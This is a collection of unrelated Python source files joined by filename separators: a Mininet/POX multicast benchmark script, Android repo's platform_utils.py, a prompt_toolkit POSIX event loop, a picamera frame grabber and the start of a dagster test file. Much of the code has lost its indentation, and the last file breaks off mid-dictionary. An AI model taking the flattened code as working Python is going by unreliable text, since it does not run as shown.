pipe.send(test_success)
pipe.close()
return
# Launch the external controller
pox_link_weight_type = link_weight_type
static_link_weight = 0
util_link_weight = 1
if link_weight_type == 'linear': # Linear link weights
pox_link_weight_type = 'linear'
static_link_weight = 0
util_link_weight = 1
elif link_weight_type == 'sh': # Shortest-hop routing
pox_link_weight_type = 'linear'
static_link_weight = 1
util_link_weight = 0
elif link_weight_type == 'exponential': # Exponential link weights
pox_link_weight_type = 'exponential'
static_link_weight = 0
util_link_weight = 1
pox_arguments = []
static_link_weight = 0
if util_link_weight == 0:
static_link_weight = 1
    # Note: the 'periodic' and non-periodic replacement modes currently launch POX
    # with identical arguments; the mode itself is carried by --flow_replacement_mode.
    pox_arguments = ['pox.py', 'log', '--file=pox.log,w', 'openflow.discovery', '--link_timeout=30', 'openflow.keepalive',
                     'openflow.flow_tracker', '--query_interval=1', '--link_max_bw=19', '--link_cong_threshold=13', '--avg_smooth_factor=0.5', '--log_peak_usage=True',
                     'misc.benchmark_terminator', 'openflow.igmp_manager', 'misc.groupflow_event_tracer',
                     'openflow.groupflow', '--static_link_weight=' + str(static_link_weight), '--util_link_weight=' + str(util_link_weight), '--link_weight_type=' + link_weight_type, '--flow_replacement_mode=' + replacement_mode,
                     '--flow_replacement_interval=10',
                     'log.level', '--WARNING', '--openflow.flow_tracker=INFO']
print 'Launching external controller: ' + str(pox_arguments[0])
print 'Launch arguments:'
print ' '.join(pox_arguments)
with open(os.devnull, "w") as fnull:
pox_process = Popen(pox_arguments, stdout=fnull, stderr=fnull, shell=False, close_fds=True)
# Allow time for the log file to be generated
sleep(1)
# Determine the flow tracker log file
pox_log_file = open('./pox.log', 'r')
flow_log_path = None
event_log_path = None
got_flow_log_path = False
got_event_log_path = False
while (not got_flow_log_path) or (not got_event_log_path):
pox_log = pox_log_file.readline()
if 'Writing flow tracker info to file:' in pox_log:
pox_log_split = pox_log.split()
flow_log_path = pox_log_split[-1]
got_flow_log_path = True
if 'Writing event trace info to file:' in pox_log:
pox_log_split = pox_log.split()
event_log_path = pox_log_split[-1]
got_event_log_path = True
print 'Got flow tracker log file: ' + str(flow_log_path)
print 'Got event trace log file: ' + str(event_log_path)
print 'Controller initialized'
pox_log_offset = pox_log_file.tell()
pox_log_file.close()
# External controller launched
# Launch Mininet
net = Mininet(topo, controller=RemoteController, switch=OVSSwitch, link=TCLink, build=False, autoSetMacs=True)
# pox = RemoteController('pox', '127.0.0.1', 6633)
net.addController('pox', RemoteController, ip = '127.0.0.1', port = 6633)
net.start()
for switch_name in topo.get_switch_list():
#print switch_name + ' route add -host 127.0.0.1 dev lo'
net.get(switch_name).controlIntf = net.get(switch_name).intf('lo')
net.get(switch_name).cmd('route add -host 127.0.0.1 dev lo')
#print 'pox' + ' route add -host ' + net.get(switch_name).IP() + ' dev lo'
net.get('pox').cmd('route add -host ' + net.get(switch_name).IP() + ' dev lo')
#print net.get(switch_name).cmd('ifconfig')
topo.mcastConfig(net)
# Wait for controller topology discovery
controller_init_sleep_time = 10
print 'Waiting ' + str(controller_init_sleep_time) + ' seconds to allow for controller topology discovery.'
sleep(controller_init_sleep_time)
# Mininet launched
# Generate the test groups, and launch the sender applications
rand_seed = int(time())
print 'Using random seed: ' + str(rand_seed)
np.random.seed(rand_seed)
trial_start_time = time() + MEDIA_DURATION_SECONDS + 10 # Assume generation of test group events will take no more than 10 seconds
trial_end_time = trial_start_time + TRIAL_DURATION_SECONDS
mcast_group_last_octet = 1
mcast_port = 5010
for i in range(0, number_of_groups):
mcast_ip = '224.1.1.{last_octet}'.format(last_octet = str(mcast_group_last_octet))
test_group = DynamicMulticastGroupDefinition(net.hosts, mcast_ip, mcast_port, mcast_port + 1)
print 'Generating events for group: ' + mcast_ip
test_group.generate_receiver_events(trial_start_time, TRIAL_DURATION_SECONDS, RECEIVERS_AT_TRIAL_START, ARRIVAL_RATE, SERVICE_RATE)
test_groups.append(test_group)
mcast_group_last_octet += 1
mcast_port += 2
test_group_start_times = []
for i in range(0, number_of_groups):
test_group_start_times.append(uniform(0, MEDIA_DURATION_SECONDS))
test_group_start_times.sort()
# Test groups generated
# Launch initial receiver applications
group_launch_index = 0
launch_start_time = time()
while len(test_group_start_times) > 0:
cur_time = time() - launch_start_time
if cur_time >= test_group_start_times[0]:
test_group_start_times.pop(0)
print 'Launching test group ' + str(group_launch_index) + ' at launch time: ' + str(cur_time)
test_groups[group_launch_index].launch_sender_application()
test_groups[group_launch_index].update_receiver_applications(trial_start_time)
group_launch_index += 1
else:
sleep_time = test_group_start_times[0] - cur_time
sleep(sleep_time)
# Wait for trial run start time
sleep_time = trial_start_time - time()
if sleep_time < 0:
print 'WARNING: sleep_time is negative!'
else:
print 'Waiting ' + str(sleep_time) + ' seconds to allow for group initialization.'
        sleep(sleep_time)  # Wait out the rest of the group-initialization window.
# Trial has started at this point
try:
while True:
cur_time = time()
if cur_time > trial_end_time:
print 'Reached trial end at time: ' + str(cur_time)
break
next_event_time = trial_end_time
for group in test_groups:
group.update_receiver_applications(cur_time)
next_event = group.get_next_receiver_event()
if next_event is not None and next_event[0] < next_event_time:
next_event_time = next_event[0]
sleep_time = next_event_time - time()
if sleep_time < 0:
print 'WARNING: sleep_time (' + str(sleep_time) + ') is negative!'
else:
#print 'Waiting ' + str(sleep_time) + ' for next event.\n'
sleep(sleep_time)
print 'Terminating network applications'
for group in test_groups:
group.terminate_group()
print 'Network applications terminated'
print 'Terminating controller'
pox_process.send_signal(signal.SIGINT)
sleep(1)
print 'Waiting for controller termination...'
pox_process.send_signal(signal.SIGKILL)
pox_process.wait()
print 'Controller terminated'
pox_process = None
net.stop()
sleep(3)
# Print packet loss statistics
recv_packets = sum(group.get_total_recv_packets() for group in test_groups)
lost_packets = sum(group.get_total_lost_packets() for group in test_groups)
packet_loss = 0
if (recv_packets + lost_packets) != 0:
packet_loss = (float(lost_packets) / (float(recv_packets) + float(lost_packets))) * 100
print 'RecvPackets: ' + str(recv_packets) + ' LostPackets: ' + str(lost_packets) + ' PacketLoss: ' + str(packet_loss) + '%'
# Calculate mean service time (sanity check to see that exponential service time generation is working as intended)
num_apps = 0
total_service_time = 0
for group in test_groups:
for recv_app in group.receiver_applications:
num_apps += 1
total_service_time += recv_app.service_time
print 'Average Service Time: ' + str(total_service_time / num_apps)
        # Delete the log files if the test encountered an error, or write the statistics log file if the run was successful
if not test_success:
call('rm -rf ' + str(flow_log_path), shell=True)
call('rm -rf ' + str(event_log_path), shell=True)
else:
write_dynamic_stats_log(log_file_name, flow_log_path, event_log_path, test_groups, topo, ARRIVAL_RATE, SERVICE_RATE,
RECEIVERS_AT_TRIAL_START, trial_start_time, trial_end_time, STATS_RECORDING_INTERVAL)
except BaseException as e:
traceback.print_exc()
test_success = False
if pipe is not None:
pipe.send(test_success)
pipe.close()
topos = { 'mcast_test': ( lambda: MulticastTestTopo() ) }
def print_usage_text():
print 'GroupFlow Multicast Testing with Mininet'
print 'Usage - Automated Benchmarking:'
print '> mininet_multicast_pox <topology_path> <iterations_to_run> <log_file_prefix> <index_of_first_log_file> <parameter_sets (number is variable and unlimited)>'
print 'Parameter sets have the form: flow_replacement_mode,link_weight_type,number_of_groups'
print 'The topology path "manhattan" is currently hardcoded to generate a 20 Mbps, 5x5 Manhattan grid topology'
if __name__ == '__main__':
setLogLevel( 'info' )
# Uncomment for easy debug testing
# topo = ManhattanGridTopo(5, 4, 20, 1, False)
# hosts = topo.get_host_list()
    # mcastTestDynamic(topo, hosts, 'test.log', 'none', 'linear', 10)
# sys.exit()
if len(sys.argv) >= 2:
if '-h' in str(sys.argv[1]) or 'help' in str(sys.argv[1]):
print_usage_text()
sys.exit()
if len(sys.argv) >= 6:
# Automated simulations - Differing link usage weights in Groupflow Module
log_prefix = sys.argv[3]
num_iterations = int(sys.argv[2])
first_index = int(sys.argv[4])
util_params = []
for param_index in range(5, len(sys.argv)):
param_split = sys.argv[param_index].split(',')
util_params.append((param_split[0], param_split[1], int(param_split[2])))
topo = None
if 'manhattan' in sys.argv[1]:
print 'Generating Manhattan Grid Topology'
topo = ManhattanGridTopo(5, 4, 20, 1, False)
else:
print 'Generating BRITE Specified Topology'
topo = BriteTopo(sys.argv[1])
hosts = topo.get_host_list()
start_time = time()
num_success = 0
num_failure = 0
print 'Simulations started at: ' + str(datetime.now())
for i in range(0,num_iterations):
for util_param in util_params:
test_success = False
while not test_success:
parent_pipe, child_pipe = Pipe()
p = Process(target=mcastTestDynamic, args=(topo, hosts, log_prefix + '_' + ','.join([util_param[0], util_param[1], str(util_param[2])]) + '_' + str(i + first_index) + '.log', util_param[0], util_param[1], util_param[2], child_pipe))
sim_start_time = time()
p.start()
p.join()
sim_end_time = time()
# Make extra sure the network terminated cleanly
call(['python', 'kill_running_test.py'])
test_success = parent_pipe.recv()
parent_pipe.close()
print 'Test Success: ' + str(test_success)
if test_success:
num_success += 1
else:
num_failure += 1
print 'Simulation ' + str(i+1) + '_' + ','.join([util_param[0], util_param[1], str(util_param[2])]) + ' completed at: ' + str(datetime.now()) + ' (runtime: ' + str(sim_end_time - sim_start_time) + ' seconds)'
end_time = time()
print ' '
print 'Simulations completed at: ' + str(datetime.now())
print 'Total runtime: ' + str(end_time - start_time) + ' seconds'
print 'Average runtime per sim: ' + str((end_time - start_time) / (num_iterations * len(util_params))) + ' seconds'
print 'Number of failed sims: ' + str(num_failure)
print 'Number of successful sims: ' + str(num_success)
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
    fcntl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
    def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
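# A usage sketch of the polling loop implied by the docstrings above; `proc` is a
# hypothetical subprocess with piped stdout/stderr:
#
#   streams = FileDescriptorStreams.create()
#   streams.add(proc.stdout, dest=out_buffer, std_name='stdout')
#   streams.add(proc.stderr, dest=err_buffer, std_name='stderr')
#   while not streams.is_done:
#       for stream in streams.select():
#           data = stream.read()
#           if not data:
#               stream.close()
#               streams.remove(stream)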
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
        # The queue is shared across all threads so we can simulate the
        # behavior of the select() function.
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
        # Return only one stream at a time, as it is the most straightforward
        # thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
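            # A QueueItem with data=None marks EOF: select() hands the stream back
            # one final time so the caller can close() and remove() it.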
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
platform_utils_win32.create_dirsymlink(_makelongpath(source), link_name)
else:
platform_utils_win32.create_filesymlink(_makelongpath(source), link_name)
else:
return os.symlink(source, link_name)
def _validate_winpath(path):
path = os.path.normpath(path)
if _winpath_is_valid(path):
return path
    raise ValueError("Path \"{}\" must be a relative path or an absolute "
                     "path starting with a drive letter".format(path))
def _winpath_is_valid(path):
"""Windows only: returns True if path is relative (e.g. ".\\foo") or is
absolute including a drive letter (e.g. "c:\\foo"). Returns False if path
is ambiguous (e.g. "x:foo" or "\\foo").
"""
assert isWindows()
path = os.path.normpath(path)
drive, tail = os.path.splitdrive(path)
if tail:
if not drive:
return tail[0] != os.sep # "\\foo" is invalid
else:
return tail[0] == os.sep # "x:foo" is invalid
else:
return not drive # "x:" is invalid
def _makelongpath(path):
"""Return the input path normalized to support the Windows long path syntax
("\\\\?\\" prefix) if needed, i.e. if the input path is longer than the
MAX_PATH limit.
"""
if isWindows():
# Note: MAX_PATH is 260, but, for directories, the maximum value is actually 246.
if len(path) < 246:
return path
if path.startswith(u"\\\\?\\"):
return path
if not os.path.isabs(path):
return path
# Append prefix and ensure unicode so that the special longpath syntax
# is supported by underlying Win32 API calls
return u"\\\\?\\" + os.path.normpath(path)
else:
return path
def rmtree(path, ignore_errors=False):
"""shutil.rmtree(path) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
onerror = None
if isWindows():
path = _makelongpath(path)
onerror = handle_rmtree_error
shutil.rmtree(path, ignore_errors=ignore_errors, onerror=onerror)
def handle_rmtree_error(function, path, excinfo):
# Allow deleting read-only files
os.chmod(path, stat.S_IWRITE)
function(path)
def rename(src, dst):
"""os.rename(src, dst) wrapper with support for long paths on Windows.
Availability: Unix, Windows."""
if isWindows():
# On Windows, rename fails if destination exists, see
# https://docs.python.org/2/library/os.html#os.rename
try:
os.rename(_makelongpath(src), _makelongpath(dst))
except OSError as e:
if e.errno == errno.EEXIST:
os.remove(_makelongpath(dst))
os.rename(_makelongpath(src), _makelongpath(dst))
else:
raise
else:
os.rename(src, dst)
def remove(path):
"""Remove (delete) the file path. This is a replacement for os.remove that
allows deleting read-only files on Windows, with support for long paths and
for deleting directory symbolic links.
Availability: Unix, Windows."""
if isWindows():
longpath = _makelongpath(path)
try:
os.remove(longpath)
except OSError as e:
if e.errno == errno.EACCES:
os.chmod(longpath, stat.S_IWRITE)
# Directory symbolic links must be deleted with 'rmdir'.
if islink(longpath) and isdir(longpath):
os.rmdir(longpath)
else:
os.remove(longpath)
else:
raise
else:
os.remove(path)
def walk(top, topdown=True, onerror=None, followlinks=False):
"""os.walk(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
return _walk_windows_impl(top, topdown, onerror, followlinks)
else:
return os.walk(top, topdown, onerror, followlinks)
def _walk_windows_impl(top, topdown, onerror, followlinks):
try:
names = listdir(top)
except Exception as err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(os.path.join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
if followlinks or not islink(new_path):
for x in _walk_windows_impl(new_path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
def listdir(path):
"""os.listdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.listdir(_makelongpath(path))
def rmdir(path):
"""os.rmdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
os.rmdir(_makelongpath(path))
def isdir(path):
"""os.path.isdir(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
return os.path.isdir(_makelongpath(path))
def islink(path):
"""os.path.islink(path) wrapper with support for long paths on Windows.
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.islink(_makelongpath(path))
else:
return os.path.islink(path)
def readlink(path):
"""Return a string representing the path to which the symbolic link
points. The result may be either an absolute or relative pathname;
if it is relative, it may be converted to an absolute pathname using
os.path.join(os.path.dirname(path), result).
Availability: Windows, Unix.
"""
if isWindows():
import platform_utils_win32
return platform_utils_win32.readlink(_makelongpath(path))
else:
return os.readlink(path)
def realpath(path):
"""Return the canonical path of the specified filename, eliminating
any symbolic links encountered in the path.
Availability: Windows, Unix.
"""
if isWindows():
current_path = os.path.abspath(path)
path_tail = []
for c in range(0, 100): # Avoid cycles
if islink(current_path):
target = readlink(current_path)
current_path = os.path.join(os.path.dirname(current_path), target)
else:
basename = os.path.basename(current_path)
if basename == '':
path_tail.append(current_path)
break
path_tail.append(basename)
current_path = os.path.dirname(current_path)
path_tail.reverse()
result = os.path.normpath(os.path.join(*path_tail))
return result
else:
return os.path.realpath(path)
|
posix.py
|
from __future__ import unicode_literals
import fcntl
import os
import signal
import threading
import time
from prompt_toolkit.terminal.vt100_input import InputStream
from prompt_toolkit.utils import DummyContext, in_main_thread
from prompt_toolkit.input import Input
from .base import EventLoop, INPUT_TIMEOUT
from .callbacks import EventLoopCallbacks
from .inputhook import InputHookContext
from .posix_utils import PosixStdinReader
from .utils import TimeIt
from .select import AutoSelector, Selector, fd_to_int
__all__ = (
'PosixEventLoop',
)
_now = time.time
class PosixEventLoop(EventLoop):
"""
    Event loop for posix systems (Linux, Mac OS X).
"""
def __init__(self, inputhook=None, selector=AutoSelector):
assert inputhook is None or callable(inputhook)
assert issubclass(selector, Selector)
self.running = False
self.closed = False
self._running = False
self._callbacks = None
self._calls_from_executor = []
self._read_fds = {} # Maps fd to handler.
self.selector = selector()
# Create a pipe for inter thread communication.
self._schedule_pipe = os.pipe()
fcntl.fcntl(self._schedule_pipe[0], fcntl.F_SETFL, os.O_NONBLOCK)
# Create inputhook context.
self._inputhook_context = InputHookContext(inputhook) if inputhook else None
def run(self, stdin, callbacks):
"""
The input 'event loop'.
"""
assert isinstance(stdin, Input)
assert isinstance(callbacks, EventLoopCallbacks)
assert not self._running
if self.closed:
raise Exception('Event loop already closed.')
self._running = True
self._callbacks = callbacks
inputstream = InputStream(callbacks.feed_key)
current_timeout = [INPUT_TIMEOUT] # Nonlocal
# Create reader class.
stdin_reader = PosixStdinReader(stdin.fileno())
# Only attach SIGWINCH signal handler in main thread.
        # (It's not possible to attach signal handlers in other threads. In
        # that case we should rely on the main thread to call this manually
        # instead.)
if in_main_thread():
ctx = call_on_sigwinch(self.received_winch)
else:
ctx = DummyContext()
def read_from_stdin():
" Read user input. "
# Feed input text.
data = stdin_reader.read()
inputstream.feed(data)
# Set timeout again.
current_timeout[0] = INPUT_TIMEOUT
# Quit when the input stream was closed.
if stdin_reader.closed:
self.stop()
self.add_reader(stdin, read_from_stdin)
self.add_reader(self._schedule_pipe[0], None)
with ctx:
while self._running:
# Call inputhook.
if self._inputhook_context:
with TimeIt() as inputhook_timer:
def ready(wait):
" True when there is input ready. The inputhook should return control. "
return self._ready_for_reading(current_timeout[0] if wait else 0) != []
self._inputhook_context.call_inputhook(ready)
inputhook_duration = inputhook_timer.duration
else:
inputhook_duration = 0
# Calculate remaining timeout. (The inputhook consumed some of the time.)
if current_timeout[0] is None:
remaining_timeout = None
else:
remaining_timeout = max(0, current_timeout[0] - inputhook_duration)
# Wait until input is ready.
fds = self._ready_for_reading(remaining_timeout)
# When any of the FDs are ready. Call the appropriate callback.
if fds:
# Create lists of high/low priority tasks. The main reason
# for this is to allow painting the UI to happen as soon as
# possible, but when there are many events happening, we
# don't want to call the UI renderer 1000x per second. If
# the eventloop is completely saturated with many CPU
# intensive tasks (like processing input/output), we say
# that drawing the UI can be postponed a little, to make
# CPU available. This will be a low priority task in that
# case.
tasks = []
low_priority_tasks = []
now = None # Lazy load time. (Fewer system calls.)
for fd in fds:
# For the 'call_from_executor' fd, put each pending
# item on either the high or low priority queue.
if fd == self._schedule_pipe[0]:
for c, max_postpone_until in self._calls_from_executor:
if max_postpone_until is None:
# Execute now.
tasks.append(c)
else:
# Execute soon, if `max_postpone_until` is in the future.
now = now or _now()
if max_postpone_until < now:
tasks.append(c)
else:
low_priority_tasks.append((c, max_postpone_until))
self._calls_from_executor = []
# Flush all the pipe content.
os.read(self._schedule_pipe[0], 1024)
else:
handler = self._read_fds.get(fd)
if handler:
tasks.append(handler)
# When there are high priority tasks, run all these.
# Schedule low priority tasks for the next iteration.
if tasks:
for t in tasks:
t()
# Postpone low priority tasks.
for t, max_postpone_until in low_priority_tasks:
self.call_from_executor(t, _max_postpone_until=max_postpone_until)
else:
# Currently there are only low priority tasks -> run them right now.
for t, _ in low_priority_tasks:
t()
else:
# Flush all pending keys on a timeout. (This is most
# important to flush the vt100 'Escape' key early when
# nothing else follows.)
inputstream.flush()
# Fire input timeout event.
callbacks.input_timeout()
current_timeout[0] = None
self.remove_reader(stdin)
self.remove_reader(self._schedule_pipe[0])
self._callbacks = None
def _ready_for_reading(self, timeout=None):
"""
Return the file descriptors that are ready for reading.
"""
fds = self.selector.select(timeout)
return fds
def received_winch(self):
"""
Notify the event loop that SIGWINCH has been received
"""
        # Process the signal asynchronously, because this handler can write to
        # the output, and doing that inside the signal handler easily causes
        # reentrant calls, giving runtime errors.
        # Further, this has to be thread safe. When the CommandLineInterface
        # runs outside the main thread, this function still has to be called
        # from the main thread. (The only place where we can install signal
        # handlers.)
def process_winch():
if self._callbacks:
self._callbacks.terminal_size_changed()
self.call_from_executor(process_winch)
def run_in_executor(self, callback):
"""
        Run a long-running function in a background thread.
(This is recommended for code that could block the event loop.)
Similar to Twisted's ``deferToThread``.
"""
        # Wait until the main thread is idle.
        # We start the thread by using `call_from_executor`. The event loop
        # favours processing input over `calls_from_executor`, so the thread
        # will not start until there is no more input to process and the main
        # thread becomes idle for an instant. This is good, because Python
        # threading favours CPU over I/O -- an autocompletion thread running
        # in the background would otherwise slow down the main thread
        # significantly. This is most noticeable when pasting large amounts
        # of text while real-time autocompletion is active.
def start_executor():
threading.Thread(target=callback).start()
self.call_from_executor(start_executor)
def call_from_executor(self, callback, _max_postpone_until=None):
"""
Call this function in the main event loop.
Similar to Twisted's ``callFromThread``.
        :param _max_postpone_until: `None` or `time.time` value. For internal
use. If the eventloop is saturated, consider this task to be low
priority and postpone maximum until this timestamp. (For instance,
repaint is done using low priority.)
"""
assert _max_postpone_until is None or isinstance(_max_postpone_until, float)
self._calls_from_executor.append((callback, _max_postpone_until))
if self._schedule_pipe:
try:
os.write(self._schedule_pipe[1], b'x')
except (AttributeError, IndexError, OSError):
# Handle race condition. We're in a different thread.
# - `_schedule_pipe` could have become None in the meantime.
# - We catch `OSError` (actually BrokenPipeError), because the
# main thread could have closed the pipe already.
pass
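    # Editor's note: the single-byte write above is the classic "self-pipe
    # trick". The read end of `_schedule_pipe` is registered with the selector,
    # so writing to it wakes the event loop out of `select()`, and the
    # scheduled callback is picked up on the next iteration; the loop drains
    # the pipe content with `os.read` when that fd becomes ready.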
def stop(self):
"""
Stop the event loop.
"""
self._running = False
def close(self):
self.closed = True
# Close pipes.
schedule_pipe = self._schedule_pipe
self._schedule_pipe = None
if schedule_pipe:
os.close(schedule_pipe[0])
os.close(schedule_pipe[1])
if self._inputhook_context:
self._inputhook_context.close()
def add_reader(self, fd, callback):
" Add read file descriptor to the event loop. "
fd = fd_to_int(fd)
self._read_fds[fd] = callback
self.selector.register(fd)
def remove_reader(self, fd):
" Remove read file descriptor from the event loop. "
fd = fd_to_int(fd)
if fd in self._read_fds:
del self._read_fds[fd]
self.selector.unregister(fd)
class call_on_sigwinch(object):
"""
    Context manager which installs a SIGWINCH callback.
(This signal occurs when the terminal size changes.)
"""
def __init__(self, callback):
self.callback = callback
self.previous_callback = None
def __enter__(self):
self.previous_callback = signal.signal(signal.SIGWINCH, lambda *a: self.callback())
def __exit__(self, *a, **kw):
if self.previous_callback is None:
# Normally, `signal.signal` should never return `None`.
# For some reason it happens here:
# https://github.com/jonathanslenders/python-prompt-toolkit/pull/174
signal.signal(signal.SIGWINCH, 0)
else:
signal.signal(signal.SIGWINCH, self.previous_callback)
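# Editor's note: a minimal usage sketch of `call_on_sigwinch` (not part of the
# original module). It assumes a POSIX system with a controlling terminal;
# resize the terminal while the sleep runs to see the callback fire, and note
# that the previous handler is restored when the context exits.
if __name__ == '__main__':
    import time

    def _print_resize():
        print('terminal resized')

    with call_on_sigwinch(_print_resize):
        time.sleep(10)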
|
camera.py
|
#!/usr/bin/python
import io
import threading
import picamera
class Camera(object):
running = True
current_frame = None
thread = None
camera = None
    def __init__(self, resolution="VGA", quality=50, framerate=60):
self.resolution = resolution
self.quality = quality
self.framerate = framerate
self.newframe_notify = threading.Event()
    def outputs(self):
        # Generator consumed by picamera's capture_sequence(): each yield hands
        # the same BytesIO buffer to the camera, which writes one JPEG frame
        # into it before asking for the next output.
        stream = io.BytesIO()
        while self.running:
            yield stream
            # The camera finished writing a frame; publish it and wake waiters.
            stream.seek(0)
            self.current_frame = stream.getvalue()
            self.newframe_notify.set()
            # Reset the buffer for the next frame.
            stream.seek(0)
            stream.truncate()
        self.current_frame = None
def start(self):
if self.thread: return
self.running = True
self.thread = threading.Thread(name="CameraThread", target=self._run)
self.thread.daemon = True
self.thread.start()
def stop(self):
if not self.thread: return
self.running = False
self.thread.join()
self.thread = None
    def _run(self):
        try:
            self.camera = picamera.PiCamera()
            self.camera.resolution = self.resolution
            self.camera.framerate = self.framerate
            self.camera.capture_sequence(self.outputs(), 'jpeg', use_video_port=True, quality=self.quality)
        finally:
            # Guard against PiCamera() itself failing, in which case
            # self.camera is still None.
            if self.camera is not None:
                self.camera.close()
            print('Camera closed!')
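# Editor's note: a minimal usage sketch (not part of the original module).
# It assumes a Raspberry Pi with the picamera stack available: start the
# capture thread, wait for the first frame, dump it to disk, then stop.
if __name__ == '__main__':
    cam = Camera(resolution="VGA", quality=50, framerate=30)
    cam.start()
    cam.newframe_notify.wait()           # block until a frame is published
    frame = cam.current_frame            # raw JPEG bytes
    if frame is not None:
        with open('frame.jpg', 'wb') as fh:
            fh.write(frame)
    cam.stop()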
|
test_external_step.py
|
import os
import tempfile
import time
import uuid
from threading import Thread
import pytest
from dagster import (
Field,
ModeDefinition,
RetryRequested,
String,
execute_pipeline,
execute_pipeline_iterator,
pipeline,
reconstructable,
resource,
solid,
)
from dagster.core.definitions.no_step_launcher import no_step_launcher
from dagster.core.errors import DagsterExecutionInterruptedError
from dagster.core.events import DagsterEventType
from dagster.core.execution.api import create_execution_plan
from dagster.core.execution.context_creation_pipeline import PipelineExecutionContextManager
from dagster.core.execution.plan.external_step import (
LocalExternalStepLauncher,
local_external_step_launcher,
step_context_to_step_run_ref,
step_run_ref_to_step_context,
)
from dagster.core.instance import DagsterInstance
from dagster.core.storage.pipeline_run import PipelineRun
from dagster.utils import safe_tempfile_path, send_interrupt
from dagster.utils.merger import deep_merge_dicts
RUN_CONFIG_BASE = {"solids": {"return_two": {"config": {"a": "b"}}}}
def make_run_config(scratch_dir, mode):
if mode in ["external", "request_retry"]:
step_launcher_resource_keys = ["first_step_launcher", "second_step_launcher"]
else:
step_launcher_resource_keys = ["second_step_launcher"]
return deep_merge_dicts(
RUN_CONFIG_BASE,
{
"resources": {
step_launcher_resource_key: {"config": {"scratch_dir": scratch_dir}}
for step_launcher_resource_key in step_launcher_resource_keys
},
"intermediate_storage": {"filesystem": {"config": {"base_dir": scratch_dir}}},
},
)
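# Editor's note -- for reference, make_run_config("/tmp/scratch", "external")
# deep-merges RUN_CONFIG_BASE with the launcher and storage settings, yielding
# roughly:
#     {
#         "solids": {"return_two": {"config": {"a": "b"}}},
#         "resources": {
#             "first_step_launcher": {"config": {"scratch_dir": "/tmp/scratch"}},
#             "second_step_launcher": {"config": {"scratch_dir": "/tmp/scratch"}},
#         },
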